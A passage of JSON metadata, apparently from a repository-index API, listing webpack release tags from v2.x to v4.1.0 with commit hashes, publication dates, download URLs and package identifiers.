f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:4